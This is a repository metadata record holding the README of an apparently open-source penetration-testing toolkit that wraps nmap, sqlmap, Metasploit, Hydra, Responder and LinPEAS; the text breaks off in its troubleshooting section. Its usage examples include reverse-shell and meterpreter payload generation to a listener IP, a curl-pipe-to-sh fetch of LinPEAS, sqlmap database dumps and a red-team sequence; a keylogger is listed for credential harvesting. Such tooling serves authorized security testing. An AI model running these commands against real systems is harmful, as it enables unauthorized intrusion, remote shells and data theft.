{"id":50770865,"url":"https://github.com/joemunene-by/ghost-toolkit-scripts","last_synced_at":"2026-06-11T18:01:55.364Z","repository":{"id":343370772,"uuid":"1177416719","full_name":"joemunene-by/ghost-toolkit-scripts","owner":"joemunene-by","description":"Collection of automation scripts for security testing, system hardening, and DevOps workflows.","archived":false,"fork":false,"pushed_at":"2026-04-11T23:18:04.000Z","size":97,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-04-12T01:15:08.744Z","etag":null,"topics":["automation","devops","scripts","security-tools","shell"],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/joemunene-by.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-03-10T02:16:56.000Z","updated_at":"2026-04-11T23:18:10.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/joemunene-by/ghost-toolkit-scripts","commit_stats":null,"previous_names":["joemunene-by/ghost-toolkit-scripts"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/joemunene-by/ghost-toolkit-scripts","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joemunene-by%2Fghost-toolkit-scripts","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joemunene-by%2Fghost-toolkit-scripts/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joemunene-by%2Fghost-toolkit-scripts/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joemunene-by%2Fghost-toolkit-scripts/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/joemunene-by","download_url":"https://codeload.github.com/joemunene-by/ghost-toolkit-scripts/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joemunene-by%2Fghost-toolkit-scripts/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34211067,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-11T02:00:06.485Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["automation","devops","scripts","security-tools","shell"],"created_at":"2026-06-11T18:01:54.296Z","updated_at":"2026-06-11T18:01:55.349Z","avatar_url":"https://github.com/joemunene-by.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🛡️ Ghost Toolkit Scripts 👻\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Made%20for-Pentesters-blue?style=for-the-badge\u0026logo=security\" alt=\"Pentesters\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Tools-70%2B-green?style=for-the-badge\" alt=\"70+ Tools\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/License-MIT-yellow?style=for-the-badge\" alt=\"License\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Platform-Linux%20%7C%20macOS-orange?style=for-the-badge\" alt=\"Platform\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Docker-Supported-blue?style=for-the-badge\u0026logo=docker\" alt=\"Docker\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Terraform-Cloud%20Labs-green?style=for-the-badge\u0026logo=terraform\" alt=\"Terraform\"\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/joemunene-by/ghost-toolkit-scripts/stargazers\"\u003e\u003cimg src=\"https://img.shields.io/github/stars/joemunene-by/ghost-toolkit-scripts?style=social\" alt=\"Stars\"\u003e\u003c/a\u003e\n  \u003ca href=\"https://github.com/joemunene-by/ghost-toolkit-scripts/fork\"\u003e\u003cimg src=\"https://img.shields.io/github/forks/joemunene-by/ghost-toolkit-scripts?style=social\" alt=\"Forks\"\u003e\u003c/a\u003e\n  \u003ca href=\"https://github.com/joemunene-by/ghost-toolkit-scripts/issues\"\u003e\u003cimg src=\"https://img.shields.io/github/issues/joemunene-by/ghost-toolkit-scripts\" alt=\"Issues\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n---\n\n**Keywords:** penetration-testing, security-tools, ethical-hacking, cybersecurity, nmap, sqlmap, metasploit, kali-linux, network-scanner, vulnerability-scanner, pentest-toolkit, security-framework, infosec, hacking-tools, oscp-prep, bug-bounty, recon, exploitation, forensics\n\n---\n\n```\n ██████╗██╗   ██╗██████╗ ███████╗██████╗     ██████╗ ███████╗ ██████╗ \n██╔════╝╚██╗ ██╔╝██╔══██╗██╔════╝██╔══██╗    ██╔══██╗██╔════╝██╔════╝ \n██║      ╚████╔╝ ██████╔╝█████╗  ██████╔╝    ██████╔╝█████╗  ██║      \n██║       ╚██╔╝  ██╔══██╗██╔══╝  ██╔══██╗    ██╔══██╗██╔══╝  ██║      \n╚██████╗   ██║   ██████╔╝███████╗██║  ██║    ██║  ██║███████╗╚██████╗ \n ╚═════╝   ╚═╝   ╚═════╝ ╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝ \n                                                                       \n    ██████╗ ███████╗██╗   ██╗    ██████╗  ██████╗  ██████╗ ████████╗ \n    ██╔══██╗██╔════╝██║   ██║    ██╔══██╗ ██╔═══██╗██╔═══██╗╚══██╔══╝ \n    ██║  ██║█████╗  ██║   ██║    ██████╔╝ ██║   ██║██║   ██║   ██║    \n    ██║  ██║██╔══╝  ╚██╗ ██╔╝    ██╔══██╗ ██║   ██║██║   ██║   ██║    \n    ██████╔╝███████╗ ╚████╔╝     ██║  ██║ ╚██████╔╝╚██████╔╝   ██║    \n    ╚═════╝ ╚══════╝  ╚═══╝      ╚═╝  ╚═╝  ╚═════╝  ╚═════╝    ╚═╝    \n```\n\n---\n\n## 📋 Table of Contents\n\n1. [Introduction](#introduction)\n2. [What is Penetration Testing?](#what-is-penetration-testing)\n3. [Features](#features)\n4. [Quick Start](#quick-start)\n5. [Tool Categories](#tool-categories)\n   - [Network Tools](#network-tools-9)\n   - [Web Security Tools](#web-security-tools-7)\n   - [Password Attacks](#password-attacks-5)\n   - [Exploitation Tools](#exploitation-tools-6)\n   - [Forensics \\\u0026 OSINT](#forensics--osint-6)\n   - [Defense \\\u0026 Monitoring](#defense--monitoring-3)\n   - [Utilities](#utilities-7)\n   - [Ghost Repositories](#ghost-repositories-15)\n6. [Detailed Tool Documentation](#detailed-tool-documentation)\n7. [Usage Examples](#usage-examples)\n   - [Network Scanning Workflow](#network-scanning-workflow)\n   - [Web Application Testing](#web-application-testing)\n   - [Password Cracking](#password-cracking)\n   - [Privilege Escalation](#privilege-escalation)\n8. [Installation](#installation)\n   - [Prerequisites](#prerequisites)\n   - [Automated Setup](#automated-setup)\n   - [Manual Installation](#manual-installation)\n9. [Directory Structure](#directory-structure)\n10. [Use Cases](#use-cases)\n11. [Troubleshooting](#troubleshooting)\n12. [Legal Disclaimer](#legal-disclaimer)\n13. [Contributing](#contributing)\n14. [FAQ](#faq)\n15. [Changelog](#changelog)\n16. [Credits](#credits)\n17. [License](#license)\n\n---\n\n## 📖 Introduction\n\n**Ghost Toolkit Scripts** is a comprehensive, production-ready cybersecurity toolkit designed for:\n\n- 🔴 **Penetration Testers** - Security professionals conducting authorized security assessments\n- 🛡️ **Security Researchers** - Experts investigating vulnerabilities and exploits\n- 👨‍💻 **System Administrators** - IT professionals securing their infrastructure\n- 🎓 **Students** - Those learning cybersecurity and ethical hacking\n- 🔍 **Bug Bounty Hunters** - Researchers finding vulnerabilities for rewards\n\n### Our Mission\n\nTo provide a unified, easy-to-use toolkit that combines the best open-source security tools into one cohesive framework. Ghost Toolkit simplifies the process of setting up and managing security tools, allowing professionals to focus on what matters most - finding vulnerabilities.\n\n### Why Ghost Toolkit?\n\n| Feature | Benefit |\n|---------|---------|\n| **60+ Tools** | Everything you need in one place |\n| **Automated Setup** | Get started in minutes, not hours |\n| **Categorized Interface** | Find the right tool quickly |\n| **Regular Updates** | Stay current with latest tools |\n| **Open Source** | Free to use and modify |\n| **Active Development** | Continuously improving |\n\n---\n\n## 🔐 What is Penetration Testing?\n\nPenetration testing (pentesting) is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system. Pentests are used to:\n\n- ✅ Identify vulnerabilities before malicious actors do\n- ✅ Test the effectiveness of security controls\n- ✅ Meet compliance requirements (PCI-DSS, HIPAA, SOC 2)\n- ✅ Improve overall security posture\n\n### Types of Pentesting\n\n| Type | Description |\n|------|-------------|\n| **Black Box** | No prior knowledge of the target |\n| **White Box** | Full knowledge of the system |\n| **Gray Box** | Limited knowledge (most common) |\n| **Internal** | Testing from inside the network |\n| **External** | Testing from outside the network |\n\n### The Methodology\n\n```\n┌─────────────────────────────────────────────────────────────────┐\n│                    PENTEST METHODOLOGY                          │\n├─────────────────────────────────────────────────────────────────┤\n│  1. RECONNAISSANCE     →  Information Gathering                │\n│  2. SCANNING           →  Port, Service, Vulnerability Scan    │\n│  3. ENUMERATION        →  Identifying Users, Shares, etc.      │\n│  4. EXPLOITATION       →  Gaining Access                       │\n│  5. POST-EXPLOITATION  →  Privilege Escalation, Pivoting      │\n│  6. DOCUMENTATION      →  Reporting                            │\n└─────────────────────────────────────────────────────────────────┘\n```\n\nGhost Toolkit supports all phases of penetration testing!\n\n---\n\n## ✨ Features\n\n- **60+ Security Tools** - Comprehensive coverage of all pentesting needs\n- **Docker Support** - Run in isolated containers anywhere\n- **Cloud Lab Templates** - Deploy practice environments on AWS/DigitalOcean\n- **Automated Setup** - One-command installation of all tools and dependencies\n- **Interactive Launcher** - User-friendly menu system for easy tool access\n- **One-Click Updates** - Keep all tools up-to-date with a single command\n- **Report Generator** - Create professional HTML pentest reports\n- **Shell Aliases** - Quick commands (gnmap, gsql, etc.)\n- **Auto-Update Checker** - Stay current with latest tools\n- **GitHub Actions CI/CD** - Quality assurance and testing\n- **Defense Tools** - Monitoring and detection capabilities\n- **Forensics Tools** - Digital forensics and incident response\n\n---\n\n## 🚀 Quick Start\n\n### Traditional Installation\n\n```bash\n# Clone the repository\ngit clone https://github.com/joemunene-by/ghost-toolkit-scripts.git\ncd ghost-toolkit-scripts\n\n# Make scripts executable\nchmod +x ghost_setup.sh ghost_launcher.sh ghost_update.sh\n\n# Run the automated setup\nsudo ./ghost_setup.sh\n\n# Launch the toolkit\n./ghost_launcher.sh\n```\n\n### Docker Installation (Recommended)\n\n```bash\n# Build the image\n./docker-ghost.sh build\n\n# Run interactively\n./docker-ghost.sh run\n\n# Or use docker-compose\n./docker-ghost.sh start\n```\n\n### First Scan Example\n\n```bash\n# After setup, try a simple network scan\n./tools/network/ghost_nmap.sh -t 192.168.1.1 -s fast\n```\n\n### Using Shell Aliases\n\n```bash\n# Source the aliases file\nsource config/ghost_aliases.sh\n\n# Now use quick commands\ngnmap -t 192.168.1.1 -s fast    # Nmap scan\ngsql -t \"http://target.com\" --dbs  # SQLMap\ngshell -l 10.10.10.10 -p 4444     # Generate shell\ngreport -c \"Company\" -t \"target.com\"  # Generate report\n```\n\n### Cloud Lab Deployment\n\n```bash\n# Deploy practice lab on AWS\ncd terraform\nterraform init\nterraform apply\n\n# Or DigitalOcean\ncd terraform\nterraform init -backend-config=\"token=YOUR_DO_TOKEN\"\nterraform apply\n```\n\n---\n\n## 🐳 Docker Usage\n\nRun Ghost Toolkit in an isolated Docker container:\n\n```bash\n# Build the Docker image\n./docker-ghost.sh build\n\n# Run interactively\n./docker-ghost.sh run\n\n# Start services (with docker-compose)\n./docker-ghost.sh start\n\n# Get shell inside container\n./docker-ghost.sh shell\n\n# View logs\n./docker-ghost.sh logs\n\n# Stop services\n./docker-ghost.sh stop\n\n# Clean up\n./docker-ghost.sh clean\n```\n\n### Docker Options\n\n| Command | Description |\n|---------|-------------|\n| `build` | Build Docker image |\n| `run` | Run container interactively |\n| `start` | Start with docker-compose |\n| `stop` | Stop services |\n| `shell` | Get shell access |\n| `logs` | View container logs |\n| `clean` | Remove containers \u0026 image |\n\n### Docker Features\n\n- Pre-installed security tools\n- SecLists wordlists included\n- Ghost repos cloned\n- Non-root user (ghost)\n- Persistent volumes for scans/payloads\n\n---\n\n## ☁️ Cloud Lab Deployment\n\nDeploy a practice penetration testing environment:\n\n### AWS\n\n```bash\ncd terraform\nterraform init\nterraform plan\nterraform apply\n```\n\nCreates:\n- VPC with public/private subnets\n- Attack machine (Kali/Ubuntu with Ghost Toolkit)\n- Target machines (web app, Linux)\n- Security groups configured\n\n### DigitalOcean\n\n```bash\ncd terraform\nexport DO_TOKEN=your_token\nterraform init\nterraform apply\n```\n\n---\n\n## 🔧 Shell Aliases\n\nQuick commands for fast access:\n\n```bash\n# Source aliases\nsource config/ghost_aliases.sh\n\n# Network tools\ngnmap -t 192.168.1.1 -s fast    # Nmap quick scan\ngmasscan                          # Masscan\ngarp                             # ARP scanner\ngdirb                            # Directory busting\ngssl                             # SSL analysis\n\n# Web tools\ngsql -t \"http://target\" --dbs   # SQLMap\ngnikto                           # Nikto scan\ngnuclei                          # Nuclei scan\ngdalfox                         # XSS scanner\ngwpscan                         # WordPress scan\n\n# Exploitation\ngshell -l IP -p 4444            # Generate reverse shell\ngmsf                            # Metasploit helper\nglinpeas                        # Linux privesc\ngpspy                           # Process spy\n\n# Utilities\ngpassgen -l 20                  # Generate passwords\ngrecon target.com               # Reconnaissance\ngreport -c \"Company\" -t \"target\" # Generate report\n\n# Main scripts\nghost                           # Launch menu\nghost-update                    # Update all\nghost-monitor                   # System monitor\n```\n\n---\n\n## 📊 Tool Categories\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **Nmap Pro** | Advanced port scanner with multiple scan types | Network discovery, port enumeration |\n| **Masscan** | Ultra-fast port scanner | Large network scanning |\n| **ARP Scanner** | Local network host discovery | Finding live hosts |\n| **Directory Scanner** | Web directory enumeration | Finding hidden files/folders |\n| **SSL/TLS Analyzer** | Certificate and protocol analysis | Finding SSL vulnerabilities |\n| **Subdomain Enumerator** | Subdomain discovery | Attack surface enumeration |\n| **DNS Enumerator** | DNS zone transfer and records | DNS reconnaissance |\n| **Advanced Port Scanner** | GUI-based port scanning | Detailed scanning |\n| **DNS Lookup** | Domain intelligence gathering | Information gathering |\n\n### Web Security Tools (7)\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **SQL Injection (sqlmap)** | Automated SQL injection testing | Finding SQLi vulnerabilities |\n| **Web Vulnerability Scanner (nikto)** | General web vuln scanning | Finding misconfigurations |\n| **CMS Scanner** | Drupal/Joomla identification | CMS-specific vulnerabilities |\n| **WhatWeb** | Technology fingerprinting | Identifying web technologies |\n| **WPScan** | WordPress security scanner | WordPress vulnerabilities |\n| **Port Scanner (Web UI)** | Web-based port scanning | User-friendly scanning |\n| **Vulnerability Scanner** | General vulnerability detection | Finding CVEs |\n\n### Password Attacks (5)\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **Hydra Bruteforce** | Multi-service brute force | Password cracking |\n| **Hash Identifier** | Hash type identification | Determining hash algorithms |\n| **Hash Cracker** | Dictionary-based cracking | Password recovery |\n| **MAC Spoofer** | MAC address randomization | Anonymity |\n| **WiFi Tool** | Wireless attack toolkit | WiFi security testing |\n\n### Exploitation Tools (6)\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **Reverse Shell Generator** | Multiple reverse shell payloads | Getting shell access |\n| **Payload Encoder** | Encoding obfuscation | Bypassing filters |\n| **Metasploit Helper** | msfconsole \u0026 msfvenom | Exploitation framework |\n| **Responder** | LLMNR/NBT-NS spoofing | Lateral movement |\n| **LinPEAS** | Linux privilege escalation | Finding privesc vectors |\n| **Keylogger** | Keystroke monitoring | Credential harvesting |\n\n### Forensics \u0026 OSINT (6)\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **Image Forensics** | EXIF, stego detection | Digital forensics |\n| **Strings Analyzer** | Binary analysis | Malware analysis |\n| **Volatility** | Memory forensics | RAM analysis |\n| **Steganography Tool** | Hidden data extraction | Stego detection |\n| **Metadata Scrubber** | EXIF removal | Privacy protection |\n| **Caesar Cipher Tool** | Classical cipher tool | Cryptography learning |\n\n### Defense \u0026 Monitoring (3)\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **Process Monitor** | Live system monitoring | Detecting anomalies |\n| **Log Watcher** | Real-time log alerting | Intrusion detection |\n| **File Integrity** | Tripwire-style monitoring | Detecting changes |\n\n### Utilities (7)\n\n| Tool | Description | Use Case |\n|------|-------------|----------|\n| **Password Generator** | Secure password creation | Credential generation |\n| **Network Recon** | DNS/GeoIP/Whois | Information gathering |\n| **File Hasher** | Hash calculation | File verification |\n| **Port Knocker** | Port knocking daemon | Secure access |\n| **Tor Setup** | Tor configuration | Anonymity |\n| **Pentest Oneliners** | 50+ ready commands | Quick operations |\n| **Base64 Converter** | Encoding/decoding | Data transformation |\n\n### Ghost Repositories (15)\n\nCustom tools developed by [joemunene-by](https://github.com/joemunene-by):\n\n| Repository | Description |\n|------------|-------------|\n| Port-scanner | Modern web-based port scanner |\n| Advanced Port Scanner | Python-based detailed scanner |\n| Hash Cracker | Professional hash cracking framework |\n| MAC Spoofer | Advanced MAC address management |\n| SentinelPulse | Real-time threat intelligence |\n| Steganography-tool | LSB steganography |\n| Network-Traffic-Analyzer | Enterprise-grade packet analysis |\n| Metadata Scrubber | EXIF/metadata removal |\n| Caesar Cipher Tool | Educational cipher tool |\n| Vulnerabilities-Scanner | Static secret scanning |\n| DNS-Lookup-and-Domain-Intelligence-Tool | DNS reconnaissance |\n| Key-logger | Surveillance suite (educational) |\n| ghost-dashboard-v4 | Unified dashboard |\n| Simple-Vulnerabilities-Scanner | Lightweight scanner |\n| ai-coding-assistant | AI-powered development |\n\n---\n\n## 📚 Detailed Tool Documentation\n\n### Network Scanning\n\n#### Nmap Pro\n\nThe Swiss Army knife of network scanning.\n\n```bash\n# Basic usage\n./tools/network/ghost_nmap.sh -t 192.168.1.1\n\n# Fast scan (top 100 ports)\n./tools/network/ghost_nmap.sh -t 192.168.1.1 -s fast\n\n# Full port scan\n./tools/network/ghost_nmap.sh -t 192.168.1.1 -s full\n\n# Stealth SYN scan\n./tools/network/ghost_nmap.sh -t 192.168.1.1 -s stealth\n\n# Vulnerability scan\n./tools/network/ghost_nmap.sh -t 192.168.1.1 -s vuln\n```\n\n#### Masscan\n\nFor scanning large networks quickly.\n\n```bash\n# Quick port scan\n./tools/network/ghost_masscan.sh -t 10.0.0.1/24\n\n# Specific ports\n./tools/network/ghost_masscan.sh -t 10.0.0.1 -p \"80,443,22,3389\"\n```\n\n### Web Application Testing\n\n#### SQL Injection with sqlmap\n\n```bash\n# Basic test\n./tools/web/ghost_sqlmap.sh -t \"http://target.com/page.php?id=1\"\n\n# Enumerate databases\n./tools/web/ghost_sqlmap.sh -t \"http://target.com/page.php?id=1\" --dbs\n\n# Dump data\n./tools/web/ghost_sqlmap.sh -t \"http://target.com/page.php?id=1\" --dump\n```\n\n### Exploitation\n\n#### Reverse Shell Generator\n\n```bash\n# Bash reverse shell\n./tools/exploitation/ghost_shell.sh -l 10.10.10.10 -p 4444 -s bash\n\n# Python reverse shell\n./tools/exploitation/ghost_shell.sh -l 10.10.10.10 -p 4444 -s python\n\n# PHP reverse shell\n./tools/exploitation/ghost_shell.sh -l 10.10.10.10 -p 4444 -s php\n\n# PowerShell reverse shell\n./tools/exploitation/ghost_shell.sh -l 10.10.10.10 -p 4444 -s powershell\n```\n\n#### Metasploit Payload Generation\n\n```bash\n# Linux x64 shell\n./tools/exploitation/ghost_msf.sh payload linux/x64/shell_reverse_tcp lhost 10.10.10.10 lport 4444\n\n# Windows meterpreter\n./tools/exploitation/ghost_msf.sh payload windows/meterpreter/reverse_tcp lhost 10.10.10.10 lport 4444 -f exe\n\n# PHP meterpreter\n./tools/exploitation/ghost_msf.sh payload php/meterpreter_reverse_tcp lhost 10.10.10.10 lport 4444\n```\n\n### Privilege Escalation\n\n#### LinPEAS\n\n```bash\n# Basic scan\n./tools/exploitation/ghost_linpeas.sh\n\n# With color output\n./tools/exploitation/ghost_linpeas.sh -c\n\n# Quiet mode\n./tools/exploitation/ghost_linpeas.sh -q\n```\n\n### Forensics\n\n#### Image Forensics\n\n```bash\n# Basic analysis\n./tools/forensics/ghost_forensics.sh -f image.jpg\n\n# Extract hidden data\n./tools/forensics/ghost_forensics.sh -f image.jpg -e\n\n# Brute force passphrase\n./tools/forensics/ghost_forensics.sh -f image.jpg -b\n```\n\n---\n\n## 💡 Usage Examples\n\n### Network Scanning Workflow\n\n```bash\n# 1. Discover live hosts\n./tools/network/ghost_nmap.sh -t 192.168.1.0/24 -s fast\n\n# 2. Port scan discovered hosts\n./tools/network/ghost_masscan.sh -t 192.168.1.5 -p \"1-1000\"\n\n# 3. Service version detection\n./tools/network/ghost_nmap.sh -t 192.168.1.5 -s service\n\n# 4. Vulnerability scanning\n./tools/network/ghost_nmap.sh -t 192.168.1.5 -s vuln\n```\n\n### Web Application Testing\n\n```bash\n# 1. Fingerprint the target\n./tools/web/ghost_whatweb.sh -t http://target.com\n\n# 2. Directory enumeration\n./tools/web/ghost_dirb.sh -t http://target.com\n\n# 3. Vulnerability scanning\n./tools/web/ghost_nikto.sh -t http://target.com\n\n# 4. SQL injection testing\n./tools/web/ghost_sqlmap.sh -t \"http://target.com/page.php?id=1\" --dbs\n```\n\n### Password Cracking\n\n```bash\n# 1. Identify hash type\n./tools/password/ghost_hashid.sh -h 5d41402abc4b2a76b9719d911017c592\n\n# 2. Create wordlist (optional)\n./tools/utilities/ghost_passgen.sh -l 12 -c 1000 \u003e wordlist.txt\n\n# 3. Crack the hash\ncd ~/ghost_toolkit/Hash-Cracker-Dictionary-Brute- \u0026\u0026 python3 main.py\n```\n\n### Privilege Escalation\n\n```bash\n# 1. On target machine, download and run LinPEAS\n./tools/exploitation/ghost_linpeas.sh\n\n# 2. Or for quick check\ncurl -Ls https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linpeas/linpeas.sh | sh\n```\n\n---\n\n## 📦 Installation\n\n### Prerequisites\n\n#### System Requirements\n\n| Requirement | Minimum | Recommended |\n|-------------|---------|-------------|\n| OS | Ubuntu 20.04+ / Debian 11+ | Ubuntu 22.04 LTS |\n| RAM | 4 GB | 8 GB |\n| Storage | 20 GB | 50 GB |\n| Internet | Required | Stable connection |\n\n#### Required Packages\n\n```bash\n# Core tools\nsudo apt update\nsudo apt install -y \\\n    git \\\n    python3 \\\n    python3-pip \\\n    nodejs \\\n    npm \\\n    curl \\\n    wget \\\n    build-essential\n\n# Network tools\nsudo apt install -y \\\n    nmap \\\n    masscan \\\n    net-tools \\\n    iputils-ping \\\n    arp-scan \\\n    dnsutils\n\n# Web security tools\nsudo apt install -y \\\n    nikto \\\n    dirb \\\n    gobuster \\\n    whatweb \\\n    wpscan\n\n# Password tools\nsudo apt install -y \\\n    hydra \\\n    john \\\n    hashcat\n\n# Forensics tools\nsudo apt install -y \\\n    steghide \\\n    binwalk \\\n    exiftool \\\n    foremost \\\n    imagemagick\n\n# Other tools\nsudo apt install -y \\\n    sslscan \\\n    responder \\\n    aircrack-ng \\\n    tor \\\n    proxychains\n```\n\n### Automated Setup\n\n```bash\n# Clone and run\ngit clone https://github.com/joemunene-by/ghost-toolkit-scripts.git\ncd ghost-toolkit-scripts\nchmod +x ghost_setup.sh\nsudo ./ghost_setup.sh\n```\n\nThe setup script will:\n1. ✅ Check and install missing dependencies\n2. ✅ Clone all Ghost repositories\n3. ✅ Install Python/Node.js dependencies\n4. ✅ Create necessary directories\n\n### Manual Installation\n\n```bash\n# 1. Install dependencies\nsudo apt update \u0026\u0026 sudo apt install -y git python3 pip3 nmap sqlmap nikto hydra\n\n# 2. Clone repository\ngit clone https://github.com/joemunene-by/ghost-toolkit-scripts.git\ncd ghost-toolkit-scripts\n\n# 3. Clone tool repositories\nmkdir -p ~/ghost_toolkit\ncd ~/ghost_toolkit\ngit clone https://github.com/joemunene-by/Port-scanner\ngit clone https://github.com/joemunene-by/advanced-port-scanner\n# ... (other repos)\n\n# 4. Make scripts executable\ncd ghost-toolkit-scripts\nchmod +x ghost_*.sh tools/**/*.sh\n```\n\n---\n\n## 📂 Directory Structure\n\n```\nghost-toolkit-scripts/\n├── 📜 ghost_setup.sh              # Main setup script\n├── 📜 ghost_launcher.sh           # Interactive menu (60+ tools)\n├── 📜 ghost_update.sh             # Update all tools\n├── 📜 ghost_monitor.sh            # System diagnostics\n├── 📜 diskwarn.sh                # Single disk monitor\n├── 📜 diskwarn2.sh               # Multi-disk monitor\n├── 📁 tools/                      # Tool scripts\n│   ├── 📁 network/               # 9 network tools\n│   │   ├── ghost_nmap.sh\n│   │   ├── ghost_masscan.sh\n│   │   ├── ghost_arp.sh\n│   │   ├── ghost_dirb.sh\n│   │   ├── ghost_ssl.sh\n│   │   ├── ghost_subdomain.sh\n│   │   ├── ghost_dnsenum.sh\n│   │   ├── ghost_ping sweep.sh\n│   │   └── ghost_network_discovery.sh\n│   ├── 📁 web/                   # 7 web tools\n│   │   ├── ghost_sqlmap.sh\n│   │   ├── ghost_nikto.sh\n│   │   ├── ghost_cms.sh\n│   │   ├── ghost_whatweb.sh\n│   │   ├── ghost_wpscan.sh\n│   │   ├── ghost_dirb.sh\n│   │   └── ghost_subjack.sh\n│   ├── 📁 password/              # 5 password tools\n│   │   ├── ghost_hydra.sh\n│   │   ├── ghost_hashid.sh\n│   │   ├── ghost_wifi.sh\n│   │   ├── ghost_cracker.sh\n│   │   └── ghost_passgen.sh\n│   ├── 📁 exploitation/          # 6 exploitation tools\n│   │   ├── ghost_shell.sh\n│   │   ├── ghost_encoder.sh\n│   │   ├── ghost_msf.sh\n│   │   ├── ghost_responder.sh\n│   │   ├── ghost_linpeas.sh\n│   │   └── ghost_powershell.sh\n│   ├── 📁 forensics/             # 6 forensics tools\n│   │   ├── ghost_forensics.sh\n│   │   ├── ghost_strings.sh\n│   │   ├── ghost_volatility.sh\n│   │   ├── ghost_stego.sh\n│   │   ├── ghost_binwalk.sh\n│   │   └── ghost_exiftool.sh\n│   ├── 📁 defense/              # 3 defense tools\n│   │   ├── ghost_procmon.sh\n│   │   ├── ghost_logwatch.sh\n│   │   └── ghost_integrity.sh\n│   └── 📁 utilities/            # 7 utilities\n│       ├── ghost_passgen.sh\n│       ├── ghost_recon.sh\n│       ├── ghost_hasher.sh\n│       ├── ghost_portknock.sh\n│       ├── ghost_tor.sh\n│       ├── ghost_oneliners.sh\n│       └── ghost_converter.sh\n├── 📁 docs/                      # Documentation\n├── 📁 scripts/                   # Additional scripts\n├── 📁 scans/                    # Scan results (created at runtime)\n├── 📁 payloads/                 # Generated payloads (created at runtime)\n├── 📜 LICENSE\n└── 📜 README.md\n```\n\n---\n\n## 🎯 Use Cases\n\n### 1. Internal Network Audit\n\n```bash\n# Step 1: Discover all devices\n./tools/network/ghost_nmap.sh -t 192.168.1.0/24 -s fast\n\n# Step 2: Scan for vulnerabilities\n./tools/network/ghost_nmap.sh -t 192.168.1.0/24 -s vuln\n\n# Step 3: Check SSL/TLS\n./tools/network/ghost_ssl.sh -t 192.168.1.1\n```\n\n### 2. Web Application Security Test\n\n```bash\n# Step 1: Enumerate subdomains\n./tools/network/ghost_subdomain.sh -d target.com\n\n# Step 2: Scan for vulnerabilities\n./tools/web/ghost_nikto.sh -t http://target.com\n\n# Step 3: Test for SQL injection\n./tools/web/ghost_sqlmap.sh -t \"http://target.com/page?id=1\" --dump\n```\n\n### 3. Red Team Engagement\n\n```bash\n# Step 1: Initial access - generate payload\n./tools/exploitation/ghost_msf.sh payload linux/x64/meterpreter_reverse_tcp lhost 10.10.10.10 lport 4444\n\n# Step 2: Get shell - start listener\nnc -lvp 4444\n\n# Step 3: Privilege escalation\n./tools/exploitation/ghost_linpeas.sh\n\n# Step 4: Lateral movement\n./tools/exploitation/ghost_responder.sh -i eth0\n```\n\n### 4. Digital Forensics Investigation\n\n```bash\n# Step 1: Analyze image\n./tools/forensics/ghost_forensics.sh -f evidence.jpg -e\n\n# Step 2: Extract strings\n./tools/forensics/ghost_strings.sh -f malware.exe -m all\n\n# Step 3: Memory analysis (if applicable)\n./tools/forensics/ghost_volatility.sh -m memory.raw -c pslist\n```\n\n### 5. Security Monitoring\n\n```bash\n# Step 1: Monitor processes\n./tools/defense/ghost_procmon.sh -i 2 -l 100\n\n# Step 2: Watch logs\n./tools/defense/ghost_logwatch.sh -l /var/log/auth.log -p \"failed|denied\"\n\n# Step 3: Check file integrity\n./tools/defense/ghost_integrity.sh -m check -d /var/www\n```\n\n---\n\n## 🔧 Troubleshooting\n\n### Common Issues\n\n#### Issue: \"Permission Denied\" when running scripts\n\n```bash\n# Fix: Make scripts executable\nchmod +x ghost_*.sh 